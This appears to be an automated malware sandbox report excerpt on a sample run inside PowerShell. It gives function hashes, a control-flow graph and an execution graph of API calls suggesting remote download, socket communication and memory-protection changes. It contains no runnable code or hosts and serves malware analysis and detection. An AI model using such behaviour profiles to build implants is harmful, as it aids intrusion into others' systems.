                                                                                                                                                                                                  control_flow_graph 1152 321f00-321f27 1153 321f54-321f8a 1152->1153 1154 321f29-321f2e 1152->1154 1160 321f90-321fa1 1153->1160 1161 32204a-322077 1153->1161 1155 321f30-321f36 1154->1155 1156 321f46-321f4e 1154->1156 1157 321f3a-321f44 1155->1157 1158 321f38 1155->1158 1162 321f53 1156->1162 1157->1156 1158->1156 1166 321fa3-321fa9 1160->1166 1167 321fbb-321fd8 1160->1167 1168 3220a4-3220c0 1161->1168 1169 322079-32207e 1161->1169 1170 321fab 1166->1170 1171 321fad-321fb9 1166->1171 1167->1161 1182 321fda-321ffc 1167->1182 1180 3220c2-3220cf 1168->1180 1181 322105-322132 1168->1181 1172 322080-322086 1169->1172 1173 322096-3220a3 1169->1173 1170->1167 1171->1167 1176 32208a-322094 1172->1176 1177 322088 1172->1177 1176->1173 1177->1173 1184 3220d1-3220d6 1180->1184 1185 3220fc-322104 1180->1185 1191 322134 1181->1191 1192 32213b-32214f 1181->1192 1195 322016-32202e 1182->1195 1196 321ffe-322004 1182->1196 1187 3220d8-3220de 1184->1187 1188 3220ee-3220fb 1184->1188 1185->1181 1193 3220e2-3220ec 1187->1193 1194 3220e0 1187->1194 1191->1192 1193->1188 1194->1188 1203 322030-322032 1195->1203 1204 32203c-322047 1195->1204 1198 322006 1196->1198 1199 322008-322014 1196->1199 1198->1195 1199->1195 1203->1204
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000C.00000002.442853576.0000000000320000.00000040.00000800.00020000.00000000.sdmp, Offset: 00320000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_320000_powershell.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 767f84b1b59511d743f806106663746a29effe9503b6208929a1c7d51a72d0a8
                                                                                                                                                                                                  • Instruction ID: 01ed9a2cc93a6cd6d73607349b222d500cc1d4a65bac3c301cebf838ad4a3263
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 767f84b1b59511d743f806106663746a29effe9503b6208929a1c7d51a72d0a8
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 524117306093E1AFC7138B64896066ABFB1AF47300B1AC1DBD594DF293C7759D45C762
                                                                                                                                                                                                  Function 001AD006 Relevance: .0, Instructions: 47COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000C.00000002.442785802.00000000001AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 001AD000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_1ad000_powershell.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 3c487f4553d814cfa6270d3ecbf4866ee5baeaf2dd6b7d34adc7393c85f1ae0d
                                                                                                                                                                                                  • Instruction ID: 3723abda55f9afa45916e368ece700cfd02cc2ff6b339d48a356a67c906ef66f
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3c487f4553d814cfa6270d3ecbf4866ee5baeaf2dd6b7d34adc7393c85f1ae0d
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 06018C6100D3C09FD7134B259D94752BFA8EF53624F1984CBE8858F5A3C2685C49CB72
                                                                                                                                                                                                  Function 001AD01D Relevance: .0, Instructions: 45COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000C.00000002.442785802.00000000001AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 001AD000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_1ad000_powershell.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: fc9ff2dcab8ea97c815c339b6faebbdb89e45d65891b5f9d3be1a586d5b09531
                                                                                                                                                                                                  • Instruction ID: f43c5a5dcb9f11fa5ac38ef0bf711b49c7372b1a0f9cc11d945b27dd223d1dd1
                                                                                                                                                                                                  • Opcode Fuzzy Hash: fc9ff2dcab8ea97c815c339b6faebbdb89e45d65891b5f9d3be1a586d5b09531
                                                                                                                                                                                                  • Instruction Fuzzy Hash: A201F775104B40AEE7105E25EDC4B67BF98DF82724F18C019FC460B582C3799945CAB1

                                                                                                                                                                                                  Non-executed Functions

                                                                                                                                                                                                  Function 003200A0 Relevance: 16.7, Strings: 13, Instructions: 422COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000C.00000002.442853576.0000000000320000.00000040.00000800.00020000.00000000.sdmp, Offset: 00320000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_320000_powershell.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID: (:+$(:+$(:+$L4#p$L4#p$L4#p$L4#p$L4#p$L4#p$L:+$L:+$L:+$p:+
                                                                                                                                                                                                  • API String ID: 0-3856856977
                                                                                                                                                                                                  • Opcode ID: b9db034b8cb4dd06f350ee8935106d83e671d7f45f97eea00de09f117590f942
                                                                                                                                                                                                  • Instruction ID: a6dd96f5e5a2d4029af9c23e0c43d98e59cae434cf6e12dbdbcdb9349a6baf16
                                                                                                                                                                                                  • Opcode Fuzzy Hash: b9db034b8cb4dd06f350ee8935106d83e671d7f45f97eea00de09f117590f942
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 51E12531700225DFDF1A9B64E8507BEBBA6AFC1310F258066E9459B2D3CB70DD49CB92
                                                                                                                                                                                                  Function 003205C8 Relevance: 9.0, Strings: 7, Instructions: 250COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000C.00000002.442853576.0000000000320000.00000040.00000800.00020000.00000000.sdmp, Offset: 00320000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_320000_powershell.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID: $;+$H;+$H;+$H;+$L4#p$L4#p$L4#p
                                                                                                                                                                                                  • API String ID: 0-1584371872
                                                                                                                                                                                                  • Opcode ID: 4017ee916891c75e67ae05097ea10019abe23f7bd19a37abe4ce0016b5afaaee
                                                                                                                                                                                                  • Instruction ID: 4fa36a277a5aaa64d50c070a4e65b42f20a5d2c39643fc43ab39acd81eab2b38
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4017ee916891c75e67ae05097ea10019abe23f7bd19a37abe4ce0016b5afaaee
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9A815A317043649FDB1A9B68D8107AEBBB2EFC1300F15806AE4919B293DB70ED55CB92
                                                                                                                                                                                                  Function 003202E4 Relevance: 6.4, Strings: 5, Instructions: 120COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000C.00000002.442853576.0000000000320000.00000040.00000800.00020000.00000000.sdmp, Offset: 00320000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_320000_powershell.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID: L4#p$L4#p$L4#p$L:+$L:+
                                                                                                                                                                                                  • API String ID: 0-4109606411
                                                                                                                                                                                                  • Opcode ID: 1c11ca671242f090d9591950a6c42ea3ae2132496e1d082c1d423016ae35f05d
                                                                                                                                                                                                  • Instruction ID: 8ea3d31d14a877c688764b19b71f240c50dede66e7aa49936ed55a47237132a5
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1c11ca671242f090d9591950a6c42ea3ae2132496e1d082c1d423016ae35f05d
                                                                                                                                                                                                  • Instruction Fuzzy Hash: A841D335600228EFDF2ADF55E440BBE77A6AF80310F19C065EA459B2D2C7B0DD89CB51

                                                                                                                                                                                                  Execution Graph

                                                                                                                                                                                                  Execution Coverage:5.9%
                                                                                                                                                                                                  Dynamic/Decrypted Code Coverage:19.7%
                                                                                                                                                                                                  Signature Coverage:4%
                                                                                                                                                                                                  Total number of Nodes:1510
                                                                                                                                                                                                  Total number of Limit Nodes:46
                                                                                                                                                                                                  execution_graph 52995 415d41 53010 41b411 52995->53010 52997 415d4a 53021 4020f6 52997->53021 53002 4170c4 53045 401e8d 53002->53045 53006 401fd8 11 API calls 53007 4170d9 53006->53007 53008 401fd8 11 API calls 53007->53008 53009 4170e5 53008->53009 53051 4020df 53010->53051 53015 41b456 InternetReadFile 53020 41b479 53015->53020 53016 41b4a6 InternetCloseHandle InternetCloseHandle 53018 41b4b8 53016->53018 53018->52997 53019 401fd8 11 API calls 53019->53020 53020->53015 53020->53016 53020->53019 53062 4020b7 53020->53062 53022 40210c 53021->53022 53023 4023ce 11 API calls 53022->53023 53024 402126 53023->53024 53025 402569 28 API calls 53024->53025 53026 402134 53025->53026 53027 404aa1 53026->53027 53028 404ab4 53027->53028 53129 40520c 53028->53129 53030 404ac9 ctype 53031 404b40 WaitForSingleObject 53030->53031 53032 404b20 53030->53032 53033 404b56 53031->53033 53034 404b32 send 53032->53034 53135 4210cb 54 API calls 53033->53135 53035 404b7b 53034->53035 53037 401fd8 11 API calls 53035->53037 53039 404b83 53037->53039 53038 404b69 SetEvent 53038->53035 53040 401fd8 11 API calls 53039->53040 53041 404b8b 53040->53041 53041->53002 53042 401fd8 53041->53042 53043 4023ce 11 API calls 53042->53043 53044 401fe1 53043->53044 53044->53002 53046 402163 53045->53046 53050 40219f 53046->53050 53153 402730 11 API calls 53046->53153 53048 402184 53154 402712 11 API calls std::_Deallocate 53048->53154 53050->53006 53052 4020e7 53051->53052 53068 4023ce 53052->53068 53054 4020f2 53055 43bda0 53054->53055 53060 4461b8 __Getctype 53055->53060 53056 4461f6 53084 44062d 20 API calls _abort 53056->53084 53057 4461e1 RtlAllocateHeap 53059 41b42f InternetOpenW InternetOpenUrlW 53057->53059 53057->53060 53059->53015 53060->53056 53060->53057 53083 443001 7 API calls 2 library calls 53060->53083 53063 4020bf 53062->53063 53064 4023ce 11 API calls 53063->53064 53065 4020ca 53064->53065 53085 40250a 53065->53085 53067 4020d9 53067->53020 53069 402428 53068->53069 53070 4023d8 53068->53070 53069->53054 53070->53069 53072 4027a7 53070->53072 53073 402e21 53072->53073 53076 4016b4 53073->53076 53075 402e30 53075->53069 53077 4016cb 53076->53077 53078 4016c6 53076->53078 53077->53078 53079 4016f3 53077->53079 53082 43bd68 11 API calls _abort 53078->53082 53079->53075 53081 43bd67 53082->53081 53083->53060 53084->53059 53086 40251a 53085->53086 53087 402520 53086->53087 53088 402535 53086->53088 53092 402569 53087->53092 53102 4028e8 53088->53102 53091 402533 53091->53067 53113 402888 53092->53113 53094 40257d 53095 402592 53094->53095 53096 4025a7 53094->53096 53118 402a34 22 API calls 53095->53118 53098 4028e8 28 API calls 53096->53098 53101 4025a5 53098->53101 53099 40259b 53119 4029da 22 API calls 53099->53119 53101->53091 53103 4028f1 53102->53103 53104 402953 53103->53104 53105 4028fb 53103->53105 53127 4028a4 22 API calls 53104->53127 53108 402904 53105->53108 53110 402917 53105->53110 53121 402cae 53108->53121 53111 402915 53110->53111 53112 4023ce 11 API calls 53110->53112 53111->53091 53112->53111 53114 402890 53113->53114 53115 402898 53114->53115 53120 402ca3 22 API calls 53114->53120 53115->53094 53118->53099 53119->53101 53122 402cb8 __EH_prolog 53121->53122 53128 402e54 22 API calls 53122->53128 53124 4023ce 11 API calls 53126 402d92 53124->53126 53125 402d24 53125->53124 53126->53111 53128->53125 53130 405214 53129->53130 53131 4023ce 11 API calls 53130->53131 53132 40521f 53131->53132 53136 405234 53132->53136 53134 40522e 53134->53030 53135->53038 53137 405240 53136->53137 53138 40526e 53136->53138 53139 4028e8 28 API calls 53137->53139 53152 4028a4 22 API calls 53138->53152 53142 40524a 53139->53142 53142->53134 53153->53048 53154->53050 53155 10006d60 53156 10006d69 53155->53156 53157 10006d72 53155->53157 53159 10006c5f 53156->53159 53179 10005af6 GetLastError 53159->53179 53161 10006c6c 53199 10006d7e 53161->53199 53163 10006c74 53208 100069f3 53163->53208 53166 10006c8b 53166->53157 53169 10006cce 53233 1000571e 19 API calls __dosmaperr 53169->53233 53173 10006cc9 53232 10006368 19 API calls __dosmaperr 53173->53232 53175 10006d12 53175->53169 53235 100068c9 25 API calls 53175->53235 53176 10006ce6 53176->53175 53234 1000571e 19 API calls __dosmaperr 53176->53234 53180 10005b12 53179->53180 53181 10005b0c 53179->53181 53185 10005b61 SetLastError 53180->53185 53237 1000637b 19 API calls 2 library calls 53180->53237 53236 10005e08 10 API calls 2 library calls 53181->53236 53184 10005b24 53189 10005b2c 53184->53189 53239 10005e5e 10 API calls 2 library calls 53184->53239 53185->53161 53188 10005b41 53188->53189 53190 10005b48 53188->53190 53238 1000571e 19 API calls __dosmaperr 53189->53238 53240 1000593c 19 API calls _abort 53190->53240 53191 10005b32 53193 10005b6d SetLastError 53191->53193 53242 100055a8 36 API calls _abort 53193->53242 53194 10005b53 53241 1000571e 19 API calls __dosmaperr 53194->53241 53198 10005b5a 53198->53185 53198->53193 53200 10006d8a ___scrt_is_nonwritable_in_current_image 53199->53200 53201 10005af6 _abort 36 API calls 53200->53201 53203 10006d94 53201->53203 53204 10006e18 _abort 53203->53204 53243 100055a8 36 API calls _abort 53203->53243 53244 10005671 RtlEnterCriticalSection 53203->53244 53245 1000571e 19 API calls __dosmaperr 53203->53245 53246 10006e0f RtlLeaveCriticalSection _abort 53203->53246 53204->53163 53247 100054a7 53208->53247 53211 10006a14 GetOEMCP 53214 10006a3d 53211->53214 53212 10006a26 53213 10006a2b GetACP 53212->53213 53212->53214 53213->53214 53214->53166 53215 100056d0 53214->53215 53216 1000570e 53215->53216 53220 100056de _abort 53215->53220 53258 10006368 19 API calls __dosmaperr 53216->53258 53218 100056f9 RtlAllocateHeap 53219 1000570c 53218->53219 53218->53220 53219->53169 53222 10006e20 53219->53222 53220->53216 53220->53218 53257 1000474f 7 API calls 2 library calls 53220->53257 53223 100069f3 38 API calls 53222->53223 53224 10006e3f 53223->53224 53227 10006e90 IsValidCodePage 53224->53227 53229 10006e46 53224->53229 53231 10006eb5 ___scrt_fastfail 53224->53231 53226 10006cc1 53226->53173 53226->53176 53228 10006ea2 GetCPInfo 53227->53228 53227->53229 53228->53229 53228->53231 53269 10002ada 53229->53269 53259 10006acb GetCPInfo 53231->53259 53232->53169 53233->53166 53234->53175 53235->53169 53236->53180 53237->53184 53238->53191 53239->53188 53240->53194 53241->53198 53244->53203 53245->53203 53246->53203 53248 100054c4 53247->53248 53254 100054ba 53247->53254 53249 10005af6 _abort 36 API calls 53248->53249 53248->53254 53250 100054e5 53249->53250 53255 10007a00 36 API calls __fassign 53250->53255 53252 100054fe 53256 10007a2d 36 API calls __fassign 53252->53256 53254->53211 53254->53212 53255->53252 53256->53254 53257->53220 53258->53219 53265 10006b05 53259->53265 53268 10006baf 53259->53268 53262 10002ada _ValidateLocalCookies 5 API calls 53264 10006c5b 53262->53264 53264->53229 53276 100086e4 53265->53276 53267 10008a3e 41 API calls 53267->53268 53268->53262 53270 10002ae3 53269->53270 53271 10002ae5 IsProcessorFeaturePresent 53269->53271 53270->53226 53273 10002b58 53271->53273 53346 10002b1c SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 53273->53346 53275 10002c3b 53275->53226 53277 100054a7 __fassign 36 API calls 53276->53277 53278 10008704 MultiByteToWideChar 53277->53278 53280 10008742 53278->53280 53281 100087da 53278->53281 53285 100056d0 20 API calls 53280->53285 53286 10008763 ___scrt_fastfail 53280->53286 53282 10002ada _ValidateLocalCookies 5 API calls 53281->53282 53283 10006b66 53282->53283 53290 10008a3e 53283->53290 53284 100087d4 53295 10008801 19 API calls _free 53284->53295 53285->53286 53286->53284 53288 100087a8 MultiByteToWideChar 53286->53288 53288->53284 53289 100087c4 GetStringTypeW 53288->53289 53289->53284 53291 100054a7 __fassign 36 API calls 53290->53291 53292 10008a51 53291->53292 53296 10008821 53292->53296 53295->53281 53298 1000883c 53296->53298 53297 10008862 MultiByteToWideChar 53299 10008a16 53297->53299 53300 1000888c 53297->53300 53298->53297 53301 10002ada _ValidateLocalCookies 5 API calls 53299->53301 53305 100056d0 20 API calls 53300->53305 53307 100088ad 53300->53307 53302 10006b87 53301->53302 53302->53267 53303 100088f6 MultiByteToWideChar 53304 10008962 53303->53304 53306 1000890f 53303->53306 53332 10008801 19 API calls _free 53304->53332 53305->53307 53323 10005f19 53306->53323 53307->53303 53307->53304 53311 10008971 53313 100056d0 20 API calls 53311->53313 53317 10008992 53311->53317 53312 10008939 53312->53304 53315 10005f19 10 API calls 53312->53315 53313->53317 53314 10008a07 53331 10008801 19 API calls _free 53314->53331 53315->53304 53317->53314 53318 10005f19 10 API calls 53317->53318 53319 100089e6 53318->53319 53319->53314 53320 100089f5 WideCharToMultiByte 53319->53320 53320->53314 53321 10008a35 53320->53321 53333 10008801 19 API calls _free 53321->53333 53334 10005c45 53323->53334 53325 10005f40 53326 10005f49 53325->53326 53338 10005fa1 9 API calls 2 library calls 53325->53338 53329 10002ada _ValidateLocalCookies 5 API calls 53326->53329 53328 10005f89 LCMapStringW 53328->53326 53330 10005f9b 53329->53330 53330->53304 53330->53311 53330->53312 53331->53304 53332->53299 53333->53304 53336 10005c71 53334->53336 53337 10005c75 __crt_fast_encode_pointer 53334->53337 53336->53337 53339 10005ce1 53336->53339 53337->53325 53338->53328 53340 10005d02 LoadLibraryExW 53339->53340 53343 10005cf7 53339->53343 53341 10005d37 53340->53341 53342 10005d1f GetLastError 53340->53342 53341->53343 53345 10005d4e FreeLibrary 53341->53345 53342->53341 53344 10005d2a LoadLibraryExW 53342->53344 53343->53336 53344->53341 53345->53343 53346->53275 53347 434906 53352 434bd8 SetUnhandledExceptionFilter 53347->53352 53349 43490b pre_c_initialization 53353 4455cc 20 API calls 2 library calls 53349->53353 53351 434916 53352->53349 53353->53351 53354 1000c7a7 53355 1000c7be 53354->53355 53360 1000c82c 53354->53360 53355->53360 53364 1000c7e6 GetModuleHandleA 53355->53364 53356 1000c872 53357 1000c835 GetModuleHandleA 53359 1000c83f 53357->53359 53359->53359 53359->53360 53360->53356 53360->53357 53365 1000c7ef 53364->53365 53372 1000c82c 53364->53372 53374 1000c803 53365->53374 53367 1000c872 53368 1000c835 GetModuleHandleA 53370 1000c83f 53368->53370 53370->53370 53370->53372 53372->53367 53372->53368 53375 1000c809 53374->53375 53376 1000c82c 53375->53376 53377 1000c80d VirtualProtect 53375->53377 53379 1000c872 53376->53379 53380 1000c835 GetModuleHandleA 53376->53380 53377->53376 53378 1000c81c VirtualProtect 53377->53378 53378->53376 53381 1000c83f 53380->53381 53381->53376 53382 43bea8 53385 43beb4 _swprintf ___FrameUnwindToState 53382->53385 53383 43bec2 53398 44062d 20 API calls _abort 53383->53398 53385->53383 53387 43beec 53385->53387 53386 43bec7 pre_c_initialization ___FrameUnwindToState 53393 445909 EnterCriticalSection 53387->53393 53389 43bef7 53394 43bf98 53389->53394 53393->53389 53396 43bfa6 53394->53396 53395 43bf02 53399 43bf1f LeaveCriticalSection std::_Lockit::~_Lockit 53395->53399 53396->53395 53400 4497ec 37 API calls 2 library calls 53396->53400 53398->53386 53399->53386 53400->53396 53401 4458c8 53402 4458d3 53401->53402 53404 4458fc 53402->53404 53405 4458f8 53402->53405 53407 448b04 53402->53407 53414 445920 DeleteCriticalSection 53404->53414 53415 44854a 53407->53415 53410 448b49 InitializeCriticalSectionAndSpinCount 53411 448b34 53410->53411 53422 43502b 53411->53422 53413 448b60 53413->53402 53414->53405 53416 448576 53415->53416 53417 44857a 53415->53417 53416->53417 53419 44859a 53416->53419 53429 4485e6 53416->53429 53417->53410 53417->53411 53419->53417 53420 4485a6 GetProcAddress 53419->53420 53421 4485b6 __crt_fast_encode_pointer 53420->53421 53421->53417 53423 435036 IsProcessorFeaturePresent 53422->53423 53424 435034 53422->53424 53426 435078 53423->53426 53424->53413 53436 43503c SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 53426->53436 53428 43515b 53428->53413 53430 448607 LoadLibraryExW 53429->53430 53435 4485fc 53429->53435 53431 448624 GetLastError 53430->53431 53432 44863c 53430->53432 53431->53432 53433 44862f LoadLibraryExW 53431->53433 53434 448653 FreeLibrary 53432->53434 53432->53435 53433->53432 53434->53435 53435->53416 53436->53428 53437 41e04e 53438 41e063 ctype ___scrt_get_show_window_mode 53437->53438 53439 41e266 53438->53439 53440 432f55 21 API calls 53438->53440 53445 41e21a 53439->53445 53451 41dbf3 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection ___scrt_get_show_window_mode 53439->53451 53444 41e213 ___scrt_get_show_window_mode 53440->53444 53442 41e277 53442->53445 53452 432f55 53442->53452 53444->53445 53446 432f55 21 API calls 53444->53446 53449 41e240 ___scrt_get_show_window_mode 53446->53449 53447 41e2b0 ___scrt_get_show_window_mode 53447->53445 53457 4335db 53447->53457 53449->53445 53450 432f55 21 API calls 53449->53450 53450->53439 53451->53442 53453 432f63 53452->53453 53454 432f5f 53452->53454 53455 43bda0 new 21 API calls 53453->53455 53454->53447 53456 432f68 53455->53456 53456->53447 53460 4334fa 53457->53460 53459 4335e3 53459->53445 53461 433513 53460->53461 53465 433509 53460->53465 53462 432f55 21 API calls 53461->53462 53461->53465 53463 433534 53462->53463 53463->53465 53466 4338c8 CryptAcquireContextA 53463->53466 53465->53459 53467 4338e9 CryptGenRandom 53466->53467 53468 4338e4 53466->53468 53467->53468 53469 4338fe CryptReleaseContext 53467->53469 53468->53465 53469->53468 53470 426c6d 53476 426d42 recv 53470->53476 53477 426a77 53478 426a8c 53477->53478 53482 426b1e 53477->53482 53479 426bd5 53478->53479 53480 426ad9 53478->53480 53481 426b4e 53478->53481 53478->53482 53483 426bae 53478->53483 53486 426b83 53478->53486 53490 426b0e 53478->53490 53505 424f6e 49 API calls ctype 53478->53505 53479->53482 53510 4261e6 28 API calls 53479->53510 53480->53482 53480->53490 53506 41fbfd 52 API calls 53480->53506 53481->53482 53481->53486 53508 41fbfd 52 API calls 53481->53508 53483->53479 53483->53482 53493 425b72 53483->53493 53486->53483 53509 425781 21 API calls 53486->53509 53490->53481 53490->53482 53507 424f6e 49 API calls ctype 53490->53507 53496 425b91 ___scrt_get_show_window_mode 53493->53496 53494 425ba0 53495 425bc5 53494->53495 53497 425ba5 53494->53497 53512 420669 46 API calls 53494->53512 53495->53479 53496->53494 53496->53495 53511 41ec4c 21 API calls 53496->53511 53497->53495 53501 425bae 53497->53501 53513 41daf0 49 API calls 53497->53513 53501->53495 53514 424d96 21 API calls 2 library calls 53501->53514 53503 425c48 53503->53495 53504 432f55 21 API calls 53503->53504 53504->53497 53505->53480 53506->53480 53507->53481 53508->53481 53509->53483 53510->53482 53511->53494 53512->53503 53513->53501 53514->53495 53515 4165db 53526 401e65 53515->53526 53517 4165eb 53518 4020f6 28 API calls 53517->53518 53519 4165f6 53518->53519 53520 401e65 22 API calls 53519->53520 53521 416601 53520->53521 53522 4020f6 28 API calls 53521->53522 53523 41660c 53522->53523 53531 412965 53523->53531 53527 401e6d 53526->53527 53528 401e75 53527->53528 53550 402158 22 API calls 53527->53550 53528->53517 53551 40482d 53531->53551 53533 412979 53558 4048c8 connect 53533->53558 53537 41299a 53623 402f10 53537->53623 53540 404aa1 61 API calls 53541 4129ae 53540->53541 53542 401fd8 11 API calls 53541->53542 53543 4129b6 53542->53543 53628 404c10 53543->53628 53546 401fd8 11 API calls 53547 4129cc 53546->53547 53548 401fd8 11 API calls 53547->53548 53549 4129d4 53548->53549 53552 404846 socket 53551->53552 53553 404839 53551->53553 53555 404860 CreateEventW 53552->53555 53556 404842 53552->53556 53646 40489e WSAStartup 53553->53646 53555->53533 53556->53533 53557 40483e 53557->53552 53557->53556 53559 404a1b 53558->53559 53560 4048ee 53558->53560 53561 40497e 53559->53561 53562 404a21 WSAGetLastError 53559->53562 53560->53561 53585 404923 53560->53585 53647 40531e 53560->53647 53618 402f31 53561->53618 53562->53561 53563 404a31 53562->53563 53566 404a36 53563->53566 53571 404932 53563->53571 53687 41cb72 30 API calls 53566->53687 53567 40492b 53570 404941 53567->53570 53567->53571 53568 40490f 53652 402093 53568->53652 53582 404950 53570->53582 53583 404987 53570->53583 53572 402093 28 API calls 53571->53572 53575 404a80 53572->53575 53574 404a40 53688 4052fd 28 API calls 53574->53688 53579 402093 28 API calls 53575->53579 53584 404a8f 53579->53584 53588 402093 28 API calls 53582->53588 53684 421ad1 54 API calls 53583->53684 53589 41b580 80 API calls 53584->53589 53682 420cf1 27 API calls 53585->53682 53592 40495f 53588->53592 53589->53561 53591 40498f 53594 4049c4 53591->53594 53595 404994 53591->53595 53596 402093 28 API calls 53592->53596 53686 420e97 28 API calls 53594->53686 53598 402093 28 API calls 53595->53598 53599 40496e 53596->53599 53601 4049a3 53598->53601 53602 41b580 80 API calls 53599->53602 53605 402093 28 API calls 53601->53605 53606 404973 53602->53606 53603 4049cc 53604 4049f9 CreateEventW CreateEventW 53603->53604 53607 402093 28 API calls 53603->53607 53604->53561 53608 4049b2 53605->53608 53683 41e7a2 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 53606->53683 53609 4049e2 53607->53609 53610 41b580 80 API calls 53608->53610 53612 402093 28 API calls 53609->53612 53613 4049b7 53610->53613 53614 4049f1 53612->53614 53685 421143 52 API calls 53613->53685 53616 41b580 80 API calls 53614->53616 53617 4049f6 53616->53617 53617->53604 53619 4020df 11 API calls 53618->53619 53620 402f3d 53619->53620 53621 4032a0 28 API calls 53620->53621 53622 402f59 53621->53622 53622->53537 53739 401fb0 53623->53739 53625 402f1e 53626 402055 11 API calls 53625->53626 53627 402f2d 53626->53627 53627->53540 53629 4020df 11 API calls 53628->53629 53630 404c27 53629->53630 53631 4020df 11 API calls 53630->53631 53641 404c30 53631->53641 53632 43bda0 new 21 API calls 53632->53641 53634 4020b7 28 API calls 53634->53641 53635 404ca1 53769 404e26 99 API calls 53635->53769 53638 404ca8 53640 401fd8 11 API calls 53638->53640 53639 401fd8 11 API calls 53639->53641 53642 404cb1 53640->53642 53641->53632 53641->53634 53641->53635 53641->53639 53742 404b96 53641->53742 53748 401fe2 53641->53748 53757 404cc3 53641->53757 53643 401fd8 11 API calls 53642->53643 53644 404cba 53643->53644 53644->53546 53646->53557 53648 4020df 11 API calls 53647->53648 53649 40532a 53648->53649 53689 4032a0 53649->53689 53651 405346 53651->53568 53653 40209b 53652->53653 53654 4023ce 11 API calls 53653->53654 53655 4020a6 53654->53655 53693 4024ed 53655->53693 53658 41b580 53659 41b631 53658->53659 53660 41b596 GetLocalTime 53658->53660 53661 401fd8 11 API calls 53659->53661 53662 40531e 28 API calls 53660->53662 53663 41b639 53661->53663 53664 41b5d8 53662->53664 53665 401fd8 11 API calls 53663->53665 53697 406383 53664->53697 53667 41b641 53665->53667 53667->53585 53669 402f10 28 API calls 53670 41b5f0 53669->53670 53671 406383 28 API calls 53670->53671 53672 41b5fc 53671->53672 53702 40723b 77 API calls 53672->53702 53674 41b60a 53675 401fd8 11 API calls 53674->53675 53676 41b616 53675->53676 53677 401fd8 11 API calls 53676->53677 53678 41b61f 53677->53678 53679 401fd8 11 API calls 53678->53679 53680 41b628 53679->53680 53681 401fd8 11 API calls 53680->53681 53681->53659 53682->53567 53683->53561 53684->53591 53685->53606 53686->53603 53687->53574 53691 4032aa 53689->53691 53690 4032c9 53690->53651 53691->53690 53692 4028e8 28 API calls 53691->53692 53692->53690 53694 4024f9 53693->53694 53695 40250a 28 API calls 53694->53695 53696 4020b1 53695->53696 53696->53658 53703 4051ef 53697->53703 53699 406391 53707 402055 53699->53707 53702->53674 53704 4051fb 53703->53704 53713 405274 53704->53713 53706 405208 53706->53699 53708 402061 53707->53708 53709 4023ce 11 API calls 53708->53709 53710 40207b 53709->53710 53735 40267a 53710->53735 53714 405282 53713->53714 53715 405288 53714->53715 53716 40529e 53714->53716 53724 4025f0 53715->53724 53718 4052f5 53716->53718 53719 4052b6 53716->53719 53733 4028a4 22 API calls 53718->53733 53722 4028e8 28 API calls 53719->53722 53723 40529c 53719->53723 53722->53723 53723->53706 53725 402888 22 API calls 53724->53725 53726 402602 53725->53726 53727 402672 53726->53727 53728 402629 53726->53728 53734 4028a4 22 API calls 53727->53734 53730 4028e8 28 API calls 53728->53730 53732 40263b 53728->53732 53730->53732 53732->53723 53736 40268b 53735->53736 53737 4023ce 11 API calls 53736->53737 53738 40208d 53737->53738 53738->53669 53740 4025f0 28 API calls 53739->53740 53741 401fbd 53740->53741 53741->53625 53743 404ba0 WaitForSingleObject 53742->53743 53744 404bcd recv 53742->53744 53770 421107 54 API calls 53743->53770 53746 404be0 53744->53746 53746->53641 53747 404bbc SetEvent 53747->53746 